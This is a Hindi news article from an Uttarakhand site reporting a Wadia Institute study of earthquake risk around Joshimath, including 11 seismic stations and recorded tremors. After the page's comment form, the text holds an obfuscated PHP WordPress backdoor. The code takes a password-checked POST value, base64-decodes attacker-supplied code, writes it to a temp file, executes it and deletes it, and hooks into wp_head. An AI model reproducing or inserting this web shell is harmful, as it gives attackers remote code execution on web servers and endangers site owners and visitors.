Uttarakhand: जोशीमठ में भूकंप से हो सकती है भारी तबाही, एक्सपर्ट ने स्थापित किए सिस्मोलॉजिकलनेटवर्क

Uttarakhand Press 28 September 2023: जोशीमठ में भूधंसाव के कारणों और अब वहां के हालात को लेकर विज्ञानियों से कराए गए अध्ययन में नई-नई जानकारियां सामने आई हैं। नौ संस्थाओं के विज्ञानियों की रिपोर्ट को राज्य सरकार ने हाल ही में सार्वजनिक किया है। भूकंप की दृष्टि से देखें तो यह पूरा क्षेत्र अति संवेदनशील श्रेणी में है। लिहाजा, राज्य सरकार भी इसे गंभीरता से ले रही है।

वाडिया हिमालय भूविज्ञान संस्थान से कराया गया अध्ययन भी इस चिंता को जाहिर करता है। संस्थान के विज्ञानियों ने भूकंप की छोटी से छोटी हलचल को रिकॉर्ड करने के लिए क्षेत्र में 11 सिस्मिक स्टेशन स्थापित किए हैं। जो ब्रॉडबैंड आधारित है और वाडिया संस्थान में स्थापित कंट्रोल रूम को रियल टाइम जानकारी उपलब्ध करा रहे हैं।

11 सिस्मिक स्टेशन हुए स्थापित:
इस बात की जानकारी हाल में सार्वजनिक की गई, वाडिया संस्थान की अध्ययन रिपोर्ट में साझा की गई है। वाडिया की अध्ययन रिपोर्ट के अनुसार, 11 सिस्मोलॉजिकल स्टेशन का जो नेटवर्क तैयार किया गया है, वह एक मैग्नीट्यूड तक के सूक्ष्म भूकंप तक को रिकॉर्ड करने में सक्षम है।

भूकंप से कांपी थी जोशीमठ की धरती:
अध्ययन रिपोर्ट में संस्थान के विज्ञानियों ने 13 जनवरी से 12 अप्रैल के बीच आए भूकंपों को रिकॉर्ड किया है। रिपोर्ट के मुताबिक इस अवधि में जोशीमठ के 50 किलोमीटर के दायरे में 1.5 मैग्नीट्यूड के 16 बार भूकंप रिकॉर्ड किए गए। इसे विज्ञानियों ने इस भूकंपीय जोन के लिहाज से सामान्य माना है। वर्ष 1999 के चमोली भूकंप का केंद्र जोशीमठ के दक्षिण में रिपोर्ट के मुताबिक, वर्ष 1999 में चमोली जिले में जो 6.6 मैग्नीट्यूड का भूकंप आया था, उसका केंद्र जोशीमठ के दक्षिण में था।

मंडरा रहा है भूकंप का डर:
बीते 50 साल में भी जो भूकंप इस बेल्ट में रिकॉर्ड किए गए हैं, वह सभी चमोली के भूकंप के केंद्र के आसपास ही आए हैं। इससे यह पता चलता है कि इस पूरे क्षेत्र में भूकंप की सूक्ष्म घटनाएं निरंतर हो रही हैं। यह स्थिति भूगर्भ में निरंतर तनाव की ओर भी इशारे करती है। 10 किलोमीटर की कम गहराई में आ रहे भूकंप वाडिया हिमालय भूविज्ञान संस्थान के विज्ञानियों के अनुसार, हाल में जो भी सूक्ष्म भूकंप रिकॉर्ड किए गए हैं, वह भूगर्भ में महज 10 किलोमीटर की गहराई में आए हैं।

सबसे उच्च क्षमता का भूकंप 100 किलोमीटर दूर आया:
रिपोर्ट के मुताबिक सिस्मोग्राफ ने अध्ययन अवधि में सबसे बड़ा भूकंप 24 जनवरी 2023 को 5.4 मैग्नीट्यूट का रिकॉर्ड किया। हालांकि, इसका केंद्र जोशीमठ से 100 किलोमीटर नेपाल के पश्चिमी भाग में पाया गया। सिस्मोग्राफ निरंतर रिकार्ड कर रहा शोर भूगर्भीय हलचल से उत्पन्न ध्वनि को भी सिस्मोग्राफ निरंतर रिकॉर्ड कर रहे हैं।

Read Previous

उत्तराखंड बनेगा ग्लोबल टूरिज्म डेस्टिनेशन, मुख्यमंत्री पुष्कर सिंह धामी ने 4800 करोड़ के निवेश पर किए दस्तखत

Read Next

Uttarakhand: हरिद्वार के होटल में चल रहा था देह व्यापार का धंधा, पुलिस पहुंचते ही मच गई भगदड़, तीन लड़कियां गिरफ्तार

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}